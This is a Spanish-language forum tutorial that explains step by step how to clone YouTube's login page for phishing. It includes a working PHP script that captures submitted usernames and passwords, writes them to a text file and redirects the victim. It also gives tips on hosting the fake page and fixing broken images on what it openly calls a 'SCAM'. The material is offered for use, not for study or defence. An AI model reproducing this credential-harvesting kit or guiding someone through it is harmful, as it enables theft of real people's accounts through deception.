preparar una Web para phishing desde 0
Para comenzar debeis buscar la pagina a falsificar. En mi caso utilizaré YouTube.
Este metodo no creo que sirva en todas las paginas pero en las ultimas 3 que he probado (ademas de ser una tecnica sencilla), sirve como todas las demas.
Comenzare entrando a YouTube.com:
Entramos a la pagina de login:
Damos boton derecho y le damos a Ver codigo fuente de pagina:
Y aqui tendremos su codigo fuente. Lo seleccionamos todo y le damos a copiar:
Abrimos un editor de texto y lo pegamos:
Ahora buscamos este apartado:
El apartado comienza por <form id=... En algunas paginas os saldran los apartados mas marcados. como HEADER, BODY, etc. y asi se hace mas facil buscar el apartado, pero en este caso, con darle a Ctrl + B lo buscamos y punto:
Lo sustituimos por:
<form action="index_carg.php" method="post"><table>
Lo que manda el codigo es:
Cuando esta Form tenga que hacer su acción, que ponga en funcionamiento el archivo index_carg.php (que unas fotos mas adelante vereis su estructura).
Lo sustituimos:
Abrimos nuevo editor de texto e introducmos esto:
Código: Seleccionar todo
[color=#FF0000]<?php
$login=$_POST["AQUI VA EL NOMBRE DEL APARTADO DEL USUARIO QUE SE VE EN EL INDEX.PHP"];
$pass=$_POST["AQUI VA EL NOMBRE DEL APARTADO DE LA CONTRASEÑA QUE SE VE EN EL INDEX.PHP"];
$guardar=fopen("admin.txt",a);
fwrite($guardar,"
Usuario:".$login."
Contraseña:".$pass);
fclose($guardar);
echo "<META HTTP-EQUIV='refresh' CONTENT='1; url=AQUI VA LA URL A LA QUE S VA A REDIRECCIONAR NUESTRA WEB FALSA'>";
?>[/color]
Aqui se ve el ejemplo:
Ahora abrimos de nuevo el index.php y buscamos debajo de donde hemos puesto <form action="index_carg.php" method="post"><table> algun apartado relacionado con Username, User, Usuario, Email, etc. Debemos coger la palabra que va despues de "id=":
Ahora hacemos el mismo paso con el de la Contraseña, Password, Password, Pass, etc. En este caso es asi:
Ahora guardamos el archivo index_carg.php. ¿Y porque este nombre? Por que antes en <form action="index_carg.php" method="post"><table> lo hemos llamado asi.
Una vez guardado hacemos esto:
Para terminar lo arrastramos a un navegador y vemos el resultado.
Si probais de esta forma a iniciar sesion, por mucho que le deis, no hara nada, ya que los .php necesitan estar online para trabajar. Por lo tanto, si pones un usuario y una contraseña sin habelo subido a un serviro, en el archivo admin.txt de tu escritorio no se guardara nada.
Espero haberos sido de gran ayuda y una ultiam cosita:
Si haceis el SCAM o pagina falsa como ahora de una web, y al probarlo, veis que alguna imagen está rota, os recomiendo que entreis en la pagina oficial, que busqueis como se llama esa imagen mediante Inspeccionar elemento o Ver codigo fuente de pagina, y buscarla en internet. Seguro que en mucas paginas podreis descargar la foto. Luego la subis a un servidor como ImagesHack, copiais el link, y en nuestro SCAM o .php falo, cambiais la direccion de esa pagina, por la URL que os da ImagesHack de la imagen. Asi solucionariamos el problema de las imagenes rotas.
